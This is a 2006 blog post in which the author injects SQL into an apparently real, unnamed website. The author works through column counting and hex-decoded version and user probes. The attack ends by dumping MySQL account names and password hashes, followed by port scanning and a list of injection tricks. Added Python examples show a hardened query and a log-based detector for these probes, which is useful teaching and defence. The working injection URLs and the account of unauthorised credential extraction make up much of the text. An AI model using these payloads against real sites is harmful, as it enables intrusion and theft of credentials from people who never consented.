Wednesday, August 16, 2006

MySQL injection try

Another quick note for a MySQL injection I experimented with today; this is a classic MySQL injection:

With a URL http://www.site.com/script.php?ID=2885,
changing parameter ID to -1 returns the normal response;
making it a gives Unknown column 'a' in 'where clause';
with 1.1 it works fine...
so this means this parameter is a numeric type: decimal, float, double, int, bigint, or smallint....
(remember that decimal has three types: NUMERIC, DEC, FIXED......um....can't remember other details)
then craft a union clause, http://www.site.com/script.php?ID=2885%20union/**/select/**/0/*
returns a mismatched number of columns; keep adding till it returns the normal page....(should code it up to automate the whole process....someone must have done one, google!!)
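The probing above works because the numeric ID is pasted into the WHERE clause unquoted, so whatever follows the number is parsed as SQL. The following added example (my own code, not from the original post) reproduces each response the post describes on an in-memory SQLite database standing in for MySQL, and shows the hardened handler that validates the parameter and binds it as a value. The table names script and account and their rows are constructed for the demo.

```python
"""Added example: why an unquoted numeric parameter behaves as the post
describes, and how validation plus a bound parameter closes the hole.
SQLite is used as a stand-in for MySQL; the error texts differ, but the
failure modes (bad column name, UNION column-count mismatch) are the same."""
import re
import sqlite3

# Constructed sample schema: the script's own table plus a second table that
# an uncontrolled UNION could read from.
conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE script (ID INTEGER PRIMARY KEY, title TEXT);
    INSERT INTO script VALUES (2885, 'public page');
    CREATE TABLE account (name TEXT, secret TEXT);
    INSERT INTO account VALUES ('admin', 'hunter2');  -- constructed value
""")


def lookup_vulnerable(id_param: str):
    """The pattern the post probes: the raw parameter is concatenated into
    the WHERE clause, so 'a', '1.1' or '2885 union ...' all reach the parser."""
    sql = "SELECT title FROM script WHERE ID=" + id_param
    return [row[0] for row in conn.execute(sql)]


def lookup_hardened(id_param: str):
    """Accept only a plain non-negative integer, then bind it as a value so
    the parameter can never change the shape of the statement."""
    if not re.fullmatch(r"[0-9]+", id_param):
        raise ValueError("ID must be an integer")
    sql = "SELECT title FROM script WHERE ID=?"
    return [row[0] for row in conn.execute(sql, (int(id_param),))]


def probe(fn, value: str):
    """Run one handler on one input and report ('rows', result) or
    ('error', message), so the two handlers can be compared side by side."""
    try:
        return ("rows", fn(value))
    except (sqlite3.Error, ValueError) as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    # Same inputs as the post: normal id, -1, a non-column name, a float,
    # a UNION with the wrong column count, a UNION with the right count.
    for value in ("2885", "-1", "a", "1.1",
                  "2885 union select 1,2",
                  "2885 union select secret from account"):
        print(f"{value!r:45} vulnerable={probe(lookup_vulnerable, value)}")
        print(f"{'':45} hardened  ={probe(lookup_hardened, value)}")
```

The vulnerable handler returns the "Unknown column" style error for a, silently succeeds for 1.1, reports the column-count mismatch the post uses to count columns, and leaks the second table once the count is right; the hardened handler rejects every non-integer input before it reaches the database.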

http://www.site.com/script.php?ID=28851=2%20union%20select%2051,2,3,34,75736572,75,31,30,29,28,27,26,25,24,23,22,21,20,19,18,17,16,15,14,13,12,11,10,9,8,7,6,5,4,3,2,1/*

now

http://www.site.com/script.php?ID=28851=2%20union%20select%2051,2,3,34,75736572,75,31,30,29,28,27,26,25,24,23,22,21,20,19,18,17,16,15,14,13,12,11,10,9,8,7,6,5,4,3,2,1/*

I got 342E312E3138
mysql> select 0x342E312E3138
    -> ;
+----------------+
| 0x342E312E3138 |
+----------------+
| 4.1.18         |
+----------------+

um...it is MySQL 4.1.18...

Same idea,

http://www.site.com/script.php?ID=28851=2%20union%20select%2051,2,3,34,75736572,hex(user()),31,30,29,28,27,26,25,24,23,22,21,20,19,18,17,16,15,14,13,12,11,10,9,8,7,6,5,4,3,2,1/*

mysql> select 0x726F6F74406C6F63616C686F7374
    -> ;
+--------------------------------+
| 0x726F6F74406C6F63616C686F7374 |
+--------------------------------+
| root@localhost                 |
+--------------------------------+
running with root privileges...

next, submit
http://www.site.com/script.php?ID=28851=2%20union%20select%2051,343,3,34,75736572,hex(version()),31,30,29,28,27,26,25,24,23,22,21,20,19,18,17,16,15,14,13,12,11,10,9,8,7,6,5,4,3,2,1/**/from/**/user/*

to test the existence of a user table; it doesn't exist. However, it exposed the table name, so it is brute-forceable (construct a txt with a list of possible table names, grab status codes, sort out the results...). I later found out calling database() yields the same result.


I am curious what the system is (presumably Linux, just want to confirm it), so a quick banner grab indicates this is a Unix host, and with port scanning found out telnet is open; another banner grab shows it is FreeBSD/i386....all these clues show I can simply skip trying Windows paths for dumping...

ok....time to do homework, resume after test. Next I should try to hex, ord or chr some column fields to bypass the int scheme, and figure out which field is user and pass, check exploits for this specific version of MySQL (I won't do this for sure, script kiddie shit) or probably dump out a guest-readable file (need to know its physical path to do so, how? phpinfo() might be a way to go, but it can't convert to digits....-.-)

Well, all this seems a bit script kiddie stuff, but I learnt the idea behind it and how to secure PHP code. I am still not feeling comfortable with MySQL injection...while PHP and MySQL are playing a pretty important role in the market, I just have to confront and master it.

Ok...
Resuming yesterday's work.
Someone found a SQL bug on

WebTorrent (WTcom) Script <= 0.2.4
http://[SITE]/torrents.php?mode=category&cat=0%20union%20select%20null,null,concat(username,char(32),password,char(32),email)%20from%20users%20/*

This inspired me to submit

http://www.site.com/script.php?ID=2885=2%20union%20select%2051,2,3,34,hex(concat(user,char(32),password,char(32))),2,31,30,29,28,27,26,25,24,23,22,21,20,19,18,17,16,15,14,13,12,11,10,9,8,7,6,5,4,3,2,1%20from%20mysql.user/*

Cool! It dumped out the user and password in hex....Now the task is done; it can be connected to remotely, and the next step would be to hook up and see the inside, which I am not intending to do. All these tries are solely to practise my skill....All the techniques are fully described in most whitepapers which can be found somewhere online!

Lesson Learnt:

  • all built-in functions (hex, char, oct, ascii, system, database, user) can get the task done more easily.
  • /**/ comment delimiter
  • Put ' single quote
  • Place and 1=1, and 1=0 (blind SQL injection)
  • Change the charset with hex, char, ascii, oct for converting data types
  • Use system functions for probing the database info
  • Check if the connection can be made remotely
  • Use automated tools (e.g. sqlbf...brute force will show up in the log and be detected by the admin.)
  • Many more....
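The last lesson cuts both ways: every probe in this post (union/select, the /**/ delimiter, the single quote, and 1=1, hex-encoded values) leaves a distinctive trace in the web server's access log. The following added example (my own code, not part of the original post) is the check an admin could run over such a log: it parses common-log-format lines, flags the indicators listed above, rejects non-integer values for id-style parameters, decodes the hex literals the post uses to read values back (75736572 is "user", 0x342E312E3138 is "4.1.18"), and counts findings per client address. The log lines, host and paths are constructed for the demo.

```python
"""Added example: detection of the injection probes described in the post,
run over constructed access-log lines. Not part of the original post."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed common-log-format sample (placeholder addresses and paths).
SAMPLE_LOG = """\
192.0.2.10 - - [16/Aug/2006:10:01:02 +0000] "GET /script.php?ID=2885 HTTP/1.1" 200 5120
192.0.2.10 - - [16/Aug/2006:10:01:09 +0000] "GET /script.php?ID=a HTTP/1.1" 200 412
192.0.2.10 - - [16/Aug/2006:10:01:15 +0000] "GET /script.php?ID=2885%20union/**/select/**/0/* HTTP/1.1" 200 412
192.0.2.10 - - [16/Aug/2006:10:02:30 +0000] "GET /script.php?ID=2885%20union%20select%2051,2,3,34,75736572 HTTP/1.1" 200 5120
192.0.2.11 - - [16/Aug/2006:10:03:00 +0000] "GET /script.php?ID=2886 HTTP/1.1" 200 5100
192.0.2.12 - - [16/Aug/2006:10:04:00 +0000] "GET /page.php?q=1%27%20and%201=1 HTTP/1.1" 200 900
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Indicators evaluated on the URL-decoded query string; each mirrors one
# item of the post's "lesson learnt" list.
INDICATORS = [
    ("union_select", re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)),
    ("comment_delim", re.compile(r"/\*")),
    ("boolean_test", re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+", re.I)),
    ("quote_probe", re.compile(r"'")),
]
HEX_TOKEN = re.compile(r"\b(?:0x)?([0-9a-fA-F]{6,})\b")


def decode_hex_literals(text):
    """Return the printable-ASCII strings hidden in hex tokens of the text,
    e.g. '75736572' -> 'user'; tokens that are not clean ASCII are skipped."""
    found = []
    for tok in HEX_TOKEN.findall(text):
        if len(tok) % 2:
            continue
        raw = bytes.fromhex(tok)
        if all(32 <= b < 127 for b in raw):
            found.append(raw.decode("ascii"))
    return found


def inspect_request(target):
    """Decode one request target and return (indicator names, decoded hex)."""
    query = unquote(urlsplit(target).query)
    hits = [name for name, pat in INDICATORS if pat.search(query)]
    # A parameter named like an id should be a plain integer; the post's
    # probes ('a', '1.1', '2885 union ...') all fail this check.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name.lower().endswith("id") and not re.fullmatch(r"-?[0-9]+", value):
            hits.append("non_numeric_id")
            break
    return hits, decode_hex_literals(query)


def scan_log(text):
    """Return one finding per suspicious line, in log order."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        hits, decoded = inspect_request(m["target"])
        if hits:
            findings.append({"ip": m["ip"], "status": m["status"],
                             "target": m["target"],
                             "indicators": hits, "decoded": decoded})
    return findings


def count_by_ip(findings):
    """Number of suspicious requests per client address."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    results = scan_log(SAMPLE_LOG)
    for f in results:
        print(f["ip"], f["status"], f["indicators"], f["decoded"], f["target"])
    print(count_by_ip(results))
```

Two of the six constructed lines are ordinary requests and produce no finding; the probing client shows up three times, with the decoded hex revealing which names it was testing. The per-address count is what makes the brute-force step the post mentions stand out, since a table-name wordlist produces hundreds of such lines from one source.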
